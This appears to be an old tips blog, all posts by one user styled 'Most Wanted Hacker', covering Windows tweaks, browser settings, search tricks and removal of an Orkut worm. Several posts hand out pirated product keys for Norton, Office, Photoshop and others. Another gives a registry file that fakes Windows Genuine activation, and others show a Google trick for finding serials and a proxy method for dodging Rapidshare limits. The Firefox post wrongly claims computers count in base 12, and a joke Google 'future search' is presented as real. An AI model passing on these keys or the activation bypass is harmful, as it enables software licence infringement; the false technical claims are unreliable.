YouTube For Video Download..  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Method 1.Install firefox & add-ons called video download helper.. which downloads videos from any website..

Method 2. Easy method than that..
Install Ashampoo clip finder(you can download it from Http://www.download.com)
Where u can down load clips from youtube.. just copy ulr of the clip and insert in clip finder it will download clip..

Microsoft Word trick  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Try out yourself...
Open Microsoft Word and type
=rand(200,99)
and then HIT ENTER....see what happens.
it won't hurt ur system!!

How to Backup Windows XP without S/w  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Learn how to backup your Windows XP computer quickly. This is a down and dirty full system backup. This will allow you to restore everything on your system if you had a system crash.
Steps

1. Click Start -> Run -> type in, with out the quotes, "ntbackup.exe" .
2. Click on Backup Wizard and then "Next".
3. Select the radio button "Backup everything on this computer" and click "Next".
4. Choose a location where you will save your backup.
5. Type in a name of your backup that you will recognize and click "Next".
6. Click "Finish" and your backup will begin.
7. It will complete and provide you a report of the backup.
8. Click "Close" and your backup is complete.


Tips

* Make sure the location you are backing up to has enough storage space to backup your entire computer.
* You will have to be certain you won't have to turn off your computer during the backup.
* Full System backups can take extended amounts of time depending on how much data you have to backup so be prepared.

Worst Windows Feature  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

1. ActiveX Controls


For years, ActiveX--the technology which dates all the way back to Windows 3.0's OLE (Object Linking and Embedding)?had not one but two majorly pernicious effects on computer users. Folks who use Web sites that run ActiveX applets on their PCs open themselves up to security risks, since an ActiveX control can do pretty much anything it wants on your PC once you'd told it to run. And the fact that ActiveX runs only in Internet Explorer in Windows stunted the growth of alternative browsers and operating systems for years. ActiveX controls still exist, but with some exceptions--mostly related to Microsoft "benefits" like Windows Update and Windows Genuine Advantage--it's easier than ever to ignore them. Thank goodness for that.

2. The Registry


Ever wonder why the U.S. power grid is so fragile that that a blip at one power plant in Cleveland can black out the Eastern Seaboard? We ask the same thing about Windows' Registry: Why did Microsoft put so many vital pieces of Windows configuration data in one place, where a minor problem with that single file can turn into a full-tilt PC disaster? You can back up your Registry religiously. You can run Registry cleaning utilities. You can edit the Registry very, very carefully, should you dare to edit it at all. But you can't eliminate the possibility that it'll bring Windows to its knees.

3. Internet Explorer 6


Beginning in the mid-1990s, Microsoft fought the browser wars against Netscape with all it had. With Internet Explorer 6, released in 2001, though, it seemed to declare "Mission accomplished." For five long years, IE barely changed, even as competitors such asFirefox and Opera showed there were plenty of ways to make browsing better. At the same time, attacking IE 6 security holes became a full-time occupation for an army of hackers--and patching them up turned into part-time work for everyone who used the browser. IE 7, released in 2006, is a passable upgrade, but wouldn't the world have been a better place if it had shown up two or three years earlier?

4. Notifications



Hey, you've just installed a program!A network cable is missing! You've got icons on your desktop you're not using! Windows is constantly alerting us to stuff it thinks we should know, usually by means of word balloons that pop up from the System Tray. (Which, incidentally, is more accurately called the TaskBar Notification Area.) An amazing percentage of these messages are painfully obvious, irrelevant, or just plain inaccurate. Never have so many computer users been distracted from their work by interruptions so useless.

5. Messenger Service


Just perusing the article in Microsoft's knowledge base about this alert service (no relation to the Windows Messenger IM client)is enough to make you shudder: "If advertisements are opening on your computer in a window titled Messenger Service, it may indicate that your system is not secure...some advertisers have started using this service to send information via the Internet, and these messages could be used maliciously to distribute a virus." Windows XP SP2 disabled it by default; Vista eliminated it. Good riddance.

6. Windows Update



There are lots of things you can criticize about Windows XP's approach to software patches. But when we asked around, the biggest complaint by far was how the OS's Windows Update feature (also known as Microsoft Update) pops up a dialog box nagging you to reboot your PC) and continues to do so every ten minutes until you obey. (Ignore it, and the machine may reboot if you walk away for a moment, sometimes destroying unsaved data in the process.) That dialog box is in desperate need of a button marked "I'll Reboot When I'm Damn Well Ready." Windows Vista's version doesn't offer that, but it does allow you to wait up to four hours before being pestered again.

Talk to gtalk friends from yahoo  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

► Add gtalk2voip011 to your message list.
► Its a bot so don't say hi hello or whatever.
► Then send message to Gtalk user type IM gtalk:<> <>
► Then u will get error Like the person is not online or something like that.
► But the request to add will be sent to him, as soon as he accepts it, u will be able to talk with him with this command , and he/she can reply by simply typing the message.

Tip: press up arrow to prevent typing command again and again

Here is official site http://www.gtalk2voip.com/

Some IP commands.......  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Display Connection Configuration: ipconfig /all

Display DNS Cache Info Configuration: ipconfig /displaydns

Clear DNS Cache:ipconfig /flushdns

Release All IP Address Connections: ipconfig /release

Renew All IP Address Connections IP Configuration: ipconfig /renew

Refresh DHCP and Re-Register the DNS connections: ipconfig /registerdns

Display DCHP Class Information: ipconfig /showclassid

Change/Modify DHCP Class ID: ipconfig /setclassid

Network Connections:control netconnections

Network Setup Wizard: netsetup.cpl

Test Connectivity: ping Example: ping www.xyz@%$&@.com

Trace IP address Route: tracert

Displays the TCP/IP protocol sessions: netstat

Display Local Route: route

Display Resolved MAC Addresses: arp

Accelerate access to the programz.  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Although your equipment has sufficient ram memory and you can work with several programs without problems, the system of Windows XP always uses the Kernel to send and to receive archives of the file of pagination of the hard disk, for this reason the speed of answer is smaller
Follow this steps

Beam click on the Start button - Run, write ''regedit'' and press the button OK

Now search in our registry of Windows XP until locating in following chain

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management

Look at the right in the panel u will find the word DisablePagingExecutive and double click on it.

In the window that appears change the value of 0 to 1 soon presses the button OK and Restart the Computer

With that we obtained fastest access to programs because now our Windows
will use less of the Hard disk.

Hope u see a gud change there...

Top 10 Rapidshare Search Engines  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

This summary is not available. Please click here to view the post.

Make a autorun file for ur CD  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

If you wanna make a autorun file for that CD you are ready to burn just read this...

1) You open notepad

2) now you writ: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"

***MegaUpload ToolBar Hacks***  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Hello Friends...
There is a grate tip to download from megaupload no need for download & Install That
Toolbar.
ok 1st you want to Firefox browser to do that trick...
1. open firefox......
2. Goto Address bat and type "about:config"
3. then search for "general.useragent.extra.firefox
4. then double click on that ..
5. change the default text with "Firefox/2.0 MEGAUPLOAD 1.0"
6. You have Done It....!
7. Now Download Without Any Toolbar

serials and cracks 2  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

here are some useful serials


Norton Antivirus 2007
Norton Antivirus 2007

Product Key:V4FHRMHYH7PR8FF9PY46J3DDC activation:XHHCWFWH7KTC


Norton Antivirus 2007
Norton Antivirus 2007

Product Key:V4FHRMHYH7PR8FF9PY46J3DDC activation:XHHCWFWH7KTC


NORTON ANTIVIRUS 2006

Product key: VB96FFGRFPG8DFQYCJDXJMBBH



NORTON ANTIVIRUS 2005

SERAIL >>> VM4H-2RFB-WBCV-GKQ3-JR28-BBD2

Norton Antivirus 2004

VHTQ-FFTW-CBHK-VDKP-J9MV-BBJ4
or
VH9VFRM8BBHKV3DWV7RBBGJ


Norton Antivirus 2003

SERIAL >>> AAB-14785-9682-5417



Norton Antivirus 2002

SERIAL >>> 146-0406-455-0068



AVG ANTIVIRUS V.7.5

Serial Key...70-TVTMH4-PR-C21-S3BXN-C9B-9JVF
Serial Key...70-TVTMH4-PR-C21-S3BXN-C9B-9JVF
AVG antispyware 7.5.0.47

SERIAL <> 70EW-TH17Q1-PM-C01-S1W2QD-MEM-NUYY


VCD Cutter 4.04

SERAIL >> 32-20000130-fedc3210

Nero 7 Premium Reloaded v7.5.9.0A

1C80-0000-19E5-MA2X-4001-1324-3931
1C80-0000-19E5-MA2X-4008-6459-9954
1C80-0000-19E5-MA2X-4008-9974-0906
1C80-0000-19E5-MA2X-4005-9931-5336
1C80-0000-19E5-MA2X-4008-5823-0671


Y!Tunnel pro v2.0 Build352

Serial>> ek5fx-kxxt74-encd99-t556n2-62dr2r


Kaspersky Antivirus v6.0.1.411 MP1

SERIAL : FHJ4S-R1XEX-5BW3T-JYEKB


FolderLock5.5 Registration Key: 343944892

some more serials
Windows Vista Beta 2 Build 5270

WBVG8-4JPQB-6HJ6H-XH7YY-D2GQY (Server)
R4HB8-QGQK4-79X38-QH3HK-Q3PJ6 (Client)


MS Office For XP (ALL VERSION)

SERIAL >> H7PY3-W2RRX-PJ23K-QG34X-BQ2CQ


Spyware Doctor 4.0.0.2620
Serial: BFA2-D53B-A6C7-A08B-B95E-C2DD-30F4-8E64-49CF-7E10

Adobe Photoshop CS2

SERIAL >> 1045-1087-8529-1935-6265-9401


Virtual CD v7.0.0 Network Edition

Serial: VCD6-o9gT-kOdN-twAS-B09P


kaspersky antivirus 6.0

S/N: tybgedtyhr4rthtyh


Spyware doctor 4.0.0.2602

A962-19A8-4

FIX MEMORY LEAK IN FIREFOX  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

1. Open Firefox, Type "about:config" without quotes into the address bar and hit enter/click Go.

2. Right-click anywhere, select New, then Integer. In the dialog prompt that appears, type:

browser.cache.memory.capacity

3. Click OK. Another dialog prompt will appear. This is where you decide how much memory to allocate to Firefox. This depends on how much RAM your computer has, but generally you don't want to allocate too little (under 8MB), but if you allocate too much, you might as well not do this. A good recommended setting is 16MB. If you want 16MB, enter this value into the dialog prompt:

16384

(Why 16384 instead of 16000?
Because computers use base-12 counting. Thus 16 megabytes = 16384 bytes. Likewise, if you want to double that and allocate 32MB, you'd enter 32768.)

4. Click OK to close the dialog box, then close all instances of Firefox and restart. If your Firefox still uses the same amount of memory, give it a few minutes and it should slowly clear up. If that fails, try a system reboot.

To add 13 communities in related community  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

orkut allows u only to add 9 communities in related comm.

Use this script to add more than 13....

Note:
This is only for owner of community...

One more Orkut worm! Orkut hackers are on rampage!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Orkut is getting targeted by a new Brazilian scrap virus, the virus infects users clicking on the above scrap message claiming to show some kind of video
with the machine translated english version of the message below Updated(Thanks To Liens) :

this video remind me of you.
check how cool it is. but don't get mad at me, ok?
hahaha
tell me later what you thought about it

This virus that claimes to be a video is a .exe file which infects users computer and sends the same scrap to all your friends on Orkut,
the virus installs "orkutkut.exe" and "imglog.exe" on the infected computer, the virus can easily be disabled by following the steps below:

Kill both the process from the task manager (CTRL+SHIFT+ESC).
Remove startup entries using msconfig.exe
Delete the two above mentioned files from system32 folder.

Screen shot:-
http://i270.photobucket.com/albums/jj119/mukulrocks/image.png

CONVERT A 512 MB duo/produo/MMC CARD TO 640 MB  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

I guess it works for duo/produo/mmc cards.

PrinCiple:--Your files in duo/produo/MMC is stored in multiple (disk) blocks.
So if you format using 16K block, the space used will be 16K eventhough your file is just 1K.
If you buy DUO/PRO-DUO, it is usually preformatted with 16K block. Therefore a lot of space is wasted as most installed program files are usually less than 2K.

ProCeDure:--

You will need a card reader to do this:-
edit:u can also do it by connecting u r phone via usb

1. Connect card reader and copy all your files in the memory card to computer disk.
(Make sure you set the show all/hidden/os files to "on")

2. Do a format of the memory card using command line "format" and use the /A=size option.

Alternative, you can use the Disk Management in Adminstrative Tools to format.
Make sure you select FAT16. For 256MB memory card, smallest block you can use is 4K, 128MB is 2K, 64Mb is 1K and 32MB is 512B.

(Note: You cannot use the phone "format ext.mem" to do this as the format just clear the allocation table and does not change the block size)

3. Copy back all files to memory card.

Now you will find that you will have more space.
I have installed many software to to my 256MB memory card and it is nearly full. After doing above, I got an "extra" 32MB.

For those who have problem with command line format::

Just use the Disk Managament to format

1. Goto Start->control Panel->Administrative Tools->Computer management->Disk management

2. Select your memory card/usb drive. Right-click and select "Format"

3. Select "FAT". Choose Allocation size. For 256Mb MMC select 4K, 128Mb MMC select 2K, 64Mb MMC select 1K and 32Mb MMC select 512B!

thx and cheers!

Make ur Windows Genuine using notepad!!!!  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

1. Copy and Paste the following code in the Notepad.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd
"LastWPAEventLogged"=hex:d5,07,05,00,06,00,07,00,0f,00,38,00,24,00,fd,02

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"InstallDate"=dword:427cdd95
"ProductId"="69831-640-1780577-45389"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,36,39,38,33,31,2d,36,34,30,2d,\
31,37,38,30,35,37,37,2d,34,35,33,38,39,00,5a,00,00,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,00,0d,04,89,b2,15,1b,c4,ee,62,4f,e6,64,6f,01,00,\
00,00,00,00,27,ed,85,43,a2,20,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,31,34,35,30,34,00,00,00,00,00,00,00,ce,0e,\
00,00,12,42,15,a0,00,08,00,00,87,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,94,a2,b3,ac
"LicenseInfo"=hex:9e,bf,09,d0,3a,76,a5,27,bb,f2,da,88,58,ce,58,e9,05,6b,0b,82,\
c3,74,ab,42,0d,fb,ee,c3,ea,57,d0,9d,67,a5,3d,6e,42,0d,60,c0,1a,70,24,46,16,\
0a,0a,ce,0d,b8,27,4a,46,53,f3,17

2. Save the file with the .reg extension.

3. If you run the file means it will ask you the confirmation to add the value to your Registry.

4. Press Yes.

5. Reboot your System.

6. Start Downloading from Microsoft Site.

New multi Search Engine  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

http://www.vetuku.com
A new multi search engine with yahoo,google,msn,aol,altavista search results.

Google Launches Future Search  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Search tomorrow’s web, today! (gDay)

Google Australia has introduced a new feature, enabling you to search content on the internet before it is created.

Enter your search term
[e.g. footy scores]
Select “one day in advance” and click “Google Search”.
Google searches the web as it will look tomorrow

About gDay™ technology

The core technology that powers gDay™ is MATE™ (Machine Automated Temporal Extrapolation).

Using MATE’s™ machine learning and artificial intelligence techniques developed in Google’s Sydney offices, we can construct elements of the future.

Google spiders crawl publicly available web information and our index of historic, cached web content. Using a mashup of numerous factors such as recurrence plots, fuzzy measure analysis, online betting odds and the weather forecast from the iGoogle weather gadget, we can create a sophisticated model of what the internet will look like 24 hours from now.

We can use this technique to predict almost anything on the web – tomorrow’s share price movements, sports results or news events. Plus, using language regression analysis, Google can even predict the actual wording of blogs and newspaper columns, 24 hours before they’re written!

To rank these future pages in order of relevance, gDay™ uses a statistical extrapolation of a page’s future PageRank, called SageRank.

gDay™ and MATE™ were developed in Google’s Sydney R&D centre.

screenshot

http://www.google.com.au/intl/en/gday/images/steps.jpg

To change from FAT 32 to NTFS file system  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

To change from FAT 32 to NTFS file system for more stability, security and less fragmentation, open the command prompt and type:

Convert C: /FS:NTFS

"C" being the drive you wish to convert. Make sure there is a space between the C: and the foward slash (/). Once you press enter it will ask you for confirmation and press Y. Then press Y and enter once more to reboot.. This also works for windows XP Home.

Enjoy....

[Book] Greasemonkey Hacks (Hacks)  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Book Description:
Greasemonkey Hacks is an invaluable compendium 100 ingenious hacks for power users who want to master Greasemonkey, the hot new Firefox extension that allows you to write scripts that alter the web pages you visit. With Greasemonkey, you can create scripts that make a web site more usable, fix rendering bugs that site owners can’t be bothered to fix themselves, or add items to a web site’s menu bar. You can alter pages so they work better with technologies that speak a web page out loud or convert it to Braille. Greasemonkey gurus can even import, combine, and alter data from different web sites to meet their own specific needs.
Greasemonkey has achieved a cult-like following in its short lifespan, but its uses are just beginning to be explored. Let’s say you’re shopping on an e-commerce site. You can create a script that will automatically display competitive prices for that particular product from other web sites. The possibilities are limited only by your imagination and your Greasemonkey expertise. Greasemonkey Hacks can’t help you with the imagination part, but it can provide the expert hacks-complete with the sample code-you need to turn your brainstorms into reality.
More than just an essential collection of made-to-order Greasemonkey solutions, Greasemonkey Hacks is crammed with sample code, a Greasemonkey API reference, and a comprehensive list of resources, to ensure that every resource you need is available between its covers.
Some people are content to receive information from websites passively; some people want to control it. If you are one of the latter, Greasemonkey Hacks provides all the clever customizations and cutting-edge tips and tools you need to take command of any web page you view.

Code:
coming soon....

Transfer files with remote desktop  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Normally, I have seen people using remote desktop connection utility provided by windows in my office lots of times while giving a presentation.

Sometimes there is a need to transfer files from the remote computer to the local computer in the middle of the presentation, but as due to the default settings of remote desktop connection utility it does not allow transferring of files in between the local and the remote computer.

How Configure Remote Desktop Connection Utility for File Transfer

1. Open Start>>Run and type mstsc

2. Now click on options and again click on Local Resources Tab.

3. Under Local Devices and Resources (in vista) ,click on more.. button. ( In Windows Xp ) you will see a checkbox as Local Drives

4. Check the Checkbox "drives" in the newly opened window in vista or check the checkbox Local Drives in Windows XP.

5. Click OK and connect to the remote computer now .

time you will be able to transfer files in between remote and local computer.

FireFox Making World record  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Tomorrow will be a great day in History Of internet.

On Anniversay Of Firefox , Firefox is going to create a world record by downloading max no. of firefox ver 3 downloads.

Link:-

http://www.spreadfirefox.com/en-US/worldrecord


Motive:-
Firefox to set a Guinness World Record for the most software downloaded in 24 hours!

Access Stored User Names and Passwords with rundll  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

The Stored User Names and Passwords applet lets you assign user names and passwords to use when needing to authenticate yourself to services in domains other than the one you are currently logged into. The normal way of running this applet can be difficult to find quickly, so here is a way to launch it using a desktop shortcut using the rundll32.exe program:



-------------------------------------------------


Click on START - RUN and type the following (follwed by ENTER):

rundll32.exe keymgr.dll,KRShowKeyMgr

More than 1000 friends within a day  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

More than 1000 friends within a day

just visit below link to understand how we can add more than 1000 friend

http://www.orkutplus.org/2007/10/hack-add-more-than-1000-friends.html

Google Search Tricks  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Convert currency, metrics, bytes, and more

************************************
*Convert currency, metrics, bytes, and more*
************************************
Google's powerful built-in converter calculator can help you out whether you're cooking dinner, traveling abroad, or building a PC.

To find out many teaspoons are in a quarter cup type:"quarter cup in teaspoons" without
" "
To find out how many seconds there are in a year type:"seconds in a year" without " "

To find out how many euros there are to five dollars type:"5 USD in Euro" without " "

If you want to calculate something see the instructions given below

Most operators come between the two numbers they combine, such as the plus sign in the expression 1+1.

Operator Function Example

+ addition 3+44

- subtraction 13-5

* multiplication 7*8

/ division 12/3

^ exponentiation (raise to a power of) 8^2

% modulo (finds the remainder after division) 8%7

choose X choose Y determines the number of ways 18 choose 4th
of choosing a set of Y elements from a set
of X elements

root of calculates the nth root of a number 5th root of 32

% of X % of Y computes X percent of Y 20% of 150

Track flight status

Enter the airline and flight number into the Google search box and get back the arrival and departure times right inside Google's search results.

Example:Delta flight 5778

Basic Searching Tricks

Type Finds Pages Containing...

biking Italy the words biking and Italy

recycle steel OR iron information on recycling steel or recycling iron

"I have a dream" the exact phrase I have a dream

salsa –dance the word salsa but NOT the word dance

Louis +I France information about Louis the First (I), weeding out other kings
of France

castle ~glossary glossaries about castles, as well as dictonaries, lists of terms,

terminology, etc.

fortune-telling all forms of the term, whether spelled as a single word, a

phrase, or hyphenated
define:imbroglio definitions of the word imbroglio from the Web.

Find Time

Enter simply what time is it to get the local time in big cities around the world, or add the locale at the end of your query, like what time is it hong kong to get the local time there.

For example:If u need to get the time of india type "what time is it india" without " "



How to exceed your download limit on Rapidshare  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

NOTE: complicated, and yes there are proxy sites to get around rapidshare, however there are none currently that'll get around rapidshare.com:


Okay, here is a quick tutorial on how to get around those annoying "Wait X minutes before downloading" messages, as well as the one-file-at-a-time limits that are frequent on Rapidshare and similar sites. This tutorial uses Opera (because it has the best download manager), but can probably be adapted for any browser
[hide_me]
Step 1. Since this will slow down each download quite a bit, pick 4 or 5 Rapidshares that you've always wanted. This will give you the most speed boost.

Step 2. Start the biggest one as you normally would, by clicking the "Free" button.

Step 3. Go to
http://www.samair.ru/proxy/


and pick a proxy. configure your browser to use it. (In Opera, Tools/Preferences, Advanced tab, Network on the right, then click the Proxy Servers button.


Before the colon is the IP, after is the port.


Step 4: Finally, test it for speed. If the proxy seems pretty fast, start the next download, and repeat Step 3&4 until you have all your files downloading. If it seems too slow, repeat step 3 until you find a fast one.

That's all! Most of you will already know about this, but it's cool anyways.

hidden dos commands  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

There are some hidden dos commands which u can't recognise by typing help in cmd

CTTY
Change the computers input/output devices.

DATE
View or change the systems date.

DEBUG
Debug utility to create assembly programs to modify hardware settings.

DEFRAG
Re-arrange the hard disk drive to help with loading programs.

DELTREE
Deletes one or more files and/or directories.

DISABLE
Recovery console command that disables Windows system services or drivers.

DISKCOMP
Compare a disk with another disk.

DISKCOPY
Copy the contents of one disk and place them on another disk.

DOSKEY
Command to view and execute commands that have been run in the past.

DOSSHELL
A GUI to help with early MS-DOS users.

DRIVPARM
Enables overwrite of original device drivers.

ECHO
Displays messages and enables and disables echo.

EDIT
View and edit files.

EDLIN
View and edit files.

EMM386
Load extended Memory Manager.

ENABLE
Recovery console command to enable a disable service or driver.

ENDLOCAL
Stops the localization of the environment changes enabled by the setlocal command.

ERASE
Erase files from computer.


EXPAND
Expand a Microsoft Windows file back to it's original format.

EXTRACT
Extract files from the Microsoft Windows cabinets.

FASTHELP
Displays a listing of MS-DOS commands and information about them.

FC
Compare files.

FDISK
Utility used to create partitions on the hard disk drive.

FIND
Search for text within a file.

FINDSTR
Searches for a string of text within a file.

FIXBOOT
Writes a new boot sector.

FIXMBR
Writes a new boot record to a disk drive.

FOR
Boolean used in batch files.

FORMAT
Command to erase and prepare a disk drive.

FTP
Command to connect and operate on a FTP server.

FTYPE
Displays or modifies file types used in file extension associations.
GOTO
Moves a batch file to a specific label or location.

Find serial numbers for programs easy in Google  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Find serial numbers for programs easy in Google
****************************************
Get in google and search for "program name" 94FBR
In "program name" write the name of the program that you want the serial for, without the ""
There you go, your serial!

How it works...

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.
1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.
2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

Check out these for example...
"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR

Basic Needs Of Hacking  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

1. Learn about hardware - basicly how your computer works.
2. Learn about different types of software.
3. Learn DOS.(learn everything possible)
4. Learn how to make a few batch files.
5. Port scanning. ( download blues port scanner if it's your first time)
6. Learn a few programming languages HTML,C++,Python,Perl.... (i'd recommend learning html as your first lang)
7. How to secure yourself (proxy,hiding ip etc)
8. FTP
9. TCP/Ip , UDP , DHCP ,
10. Get your hands dirty with networking
11. Learn diassembler language (its the most basic language for understanding machine language and very useful to ubderstand when anything is disassembled and decoded)
12. Learn to use a Unix os. (a Unix system is generally loaded with networking tools as well as a few hacking tools)
13. Learn how to use Exploits and compile them. (Perl and c++ is must)

Best utorrent Configuration  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Firstly uTorrentis my current fav torrent download software. Its the best software in smallest package.
Download: http://download.utorrent.com/1.7.5/utorrent.exe(214kb)

After trying out many different settings I am just sharing my best configuration for utorrent. Obviously your best config may be different because of your network and hardware etc.

Coming stratight to the point, I have 450kb/s download with 100kb/s upload. You can check your speed from http://www.speedtest.net/ and make settings accordingly.

Options>Preferences:
Global maximum upload rate (kB/s) = 10
√ Allow incoming legacy connections
Global maximum number of connections = 128 (If you don't have bandwidth then more connections dont mean more speed)
Maximum number of connected peers per torrent = 16
Number of upload slots per torrent = 2
√ Use additional upload slots if upload speed < 90%
√ Enable DHT Network
√ Enable DHT for new torrents
√ Enable Peer Exchange
√ Enable scraping
√ Pre-allocate all files

Advanced Settings:
peer.lazy_bitfield = *true
net.max_halfopen = *40
peer.disconnect_inactive_interval = *600
diskio.write_queue_size = *2560
diskio.read_cache_size = *2560

I have doubled my speed after these settings. And please note that there is a 8fold difference in kilobit and kilobyte.(1kilobyte = 8 kilobits).It took me a while to understand the best settings so I am sharing with you. A well seeded torrent will download at speed of 18.

SHORT NOTE: Seeders are people who have already downloaded the file and peers are number of people who are currently downloading the file. You should have more seeders for good speed.

You can download torrents from here:

www.isohunt.com

If you found this useful then don't forget to reply so that this thread remains on the top and other people also benefit from it.

Speed Up Starting Of CD/DVD Burning Software  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Whenever you Burn your data onto a CD/DVD, you might have noticed that it takes time to open the software. Either you use Nero or Roxio or any other software, it takes time to open. You can speed this process by making some changes in the services. Some of the services used by this software are not required and can be stopped. This will make the process much faster. Lets see how.

1. Go to Start –> Control Panel –> Administrative Tools –> Services.
2. Select IMAPI CD-Burning COM Service and Disable the Startup Type.
3. Click OK and Exit.

You will now see the difference. This makes the service much faster then your previous experience. However, if you are using the Windows inbuilt burning service, then you might not see this service, and if you do then disabling this won’t have any effect.

USE UR NOTEPAD AS DIARY  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

USE UR NOTEPAD AS DIARY.

Ever wanted to maintain a diary on your PC ?
Now, you can do it without the use of a software !

USE NOTEPAD !

Do The Following :
1. Open Notepad
2. Type : .LOG
3. Save it with any name say 'Diary'
4. Open Diary.txt again

Wow you see today's date and time, so start writing your Diary !

Editing The Boot.ini File  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Boot.ini file is an initialization file, but editing it for some people has been a bad experience. In this post i will let you know the codes and their meaning and also how to edit them easily. By default this is hidden in Xp, but in case of win 98, it can be searched.
To access the file in Xp :-

• Right click on My Computer and select Properties.
• Go to the Advanced tab and click Settings in Startup and Recovery section.
• Click Edit and you will see the Boot.ini file opened in a notepad.


Now File says something like this

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition

(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /fastdetect

The First line [Boot loader] just states the Booting Process.
timeout=30 is the time that will be provided to you to select from the list of OS’s installed. This works only in case you have multiple OS’s installed. It can be reduced easily, but make sure you give enough time to react upon it. 10 Seconds is the appropriate time.
The third line says multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /fastdetect. multi(0) tells us the IDE on which the drive is attached to. Usually its Primary only. disk(0) shows the number of Hard disks mounted. rdisk(0) tells us from which disk it is booting. In case of SCSI drives, it might not show up. partition(1) tell that on which Logical partition the OS is installed on.
After that it says “Microsoft Windows XP Professional” that is the name that shows up on the OS selection page. You can put your own name there as well.
This was the editable part of Boot.ini file.
Now in case if you delete the file accidentally then you need not worry, you don’t need to create the file again. Xp will create a file of its own, and your system is safe.
But in case if someone edits it and puts in the wrong information, then it you system will find the file but not the correct path. So that might harm your Computer.

So, this was a small post on Boot.ini file and its editing. IF you got anything more to say

Enable/Disable Your Task Manager  

Posted by *ΜΘŠŤ ŴÃŇŦ€Ď ĦÃČКЄŘ*

Well, this situation might never arise when you need to Disable your Task manager. But more commonly it happens because of a virus attack. Viruses do disable the Task Manager. Now they do so by editing the Registry values. Even if you remove the viruses, the registry changes will remain and thy will continue to effect your system, until you correct them. This is easy and I will let you know how this can be done with just a small change in Registry. Here’s what you need to do.

1. Go to Start –> Run, and open Regedit.
2. Go to HKEY_CURRENT_USER\Software\Microsoft\Win

dows\CurrentVersion\Policies\System
3. If you are infected by a Virus then you will see a Dword Value “DisableTaskMgr“, if not, then create this new value.
4. To Enable it, give a value of “0“, and to Disable it, give it a value of “1“

This is a very simple method by which Task manager can be Enabled/ Disabled. Apart from that, if you are in a network, and want to disable Task manager for a user, then you need to change the Computer Policies

Hiding User Accounts On Logon Screen In XP  

